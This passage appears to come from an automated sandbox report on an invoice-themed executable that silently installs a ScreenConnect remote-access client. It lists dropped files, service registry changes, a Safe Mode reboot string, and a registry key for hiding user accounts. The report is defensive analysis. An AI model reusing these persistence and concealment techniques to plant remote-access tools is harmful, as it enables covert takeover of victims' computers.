                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05F11A91 push eax; mov dword ptr [esp], ecx0_2_05F11AA1
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04C25C78 push ebx; retf 5_3_04C25C87
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04C25E70 push esi; retf 5_3_04C25E7F
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3CE60 push eax; mov dword ptr [esp], ecx8_2_04A3CE61
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3A890 push eax; mov dword ptr [esp], ecx8_2_04A3A891
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDD0CC push es; retf 9_2_00007FFE7CDDD0CE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDD088 push es; retf 9_2_00007FFE7CDDD08A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDBDED push es; retf 9_2_00007FFE7CDDBDEE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDCD99 push es; retf 9_2_00007FFE7CDDCD9B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDD494C push ebx; retf 9_2_00007FFE7CDD494D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDD2E8 push es; retf 9_2_00007FFE7CDDD2EA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDD2CE push esp; iretd 9_2_00007FFE7CDDD2CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CDDBEBD push es; retf 9_2_00007FFE7CDDBEBE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C7569 push ebx; iretd 9_2_00007FFE7D0C756A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C7D84 push ss; iretd 9_2_00007FFE7D0C7D85
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C79B3 push cs; retf 9_2_00007FFE7D0C79B5
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C21A2 push 00000044h; iretd 9_2_00007FFE7D0C21A4
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C55D5 push ebp; iretd 9_2_00007FFE7D0C55D8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C7C7C push cs; retf 9_2_00007FFE7D0C7C7E
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C709F push cs; retf 9_2_00007FFE7D0C70A0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C1922 push FFFFFF9Fh; iretd 9_2_00007FFE7D0C1924
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C73BF push cs; retf 9_2_00007FFE7D0C73C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C7A4B push cs; retf 9_2_00007FFE7D0C7A4D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C5F16 push cs; retf 9_2_00007FFE7D0C5F17
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C2F3C pushfd ; iretd 9_2_00007FFE7D0C2F3D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7CDB00BD pushad ; iretd 10_2_00007FFE7CDB00C1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7D0C994B push cs; retf 10_2_00007FFE7D0C9958
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7D0C9990 push cs; retf 10_2_00007FFE7D0C999D

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E03.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29CB.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E03.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29CB.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364607378.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.1363549444.0000000004B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452583861.0000000002530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453076491.00000000026C2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1463574573.000000001B5E2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: invoice-benefits-agency9-24-2024.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
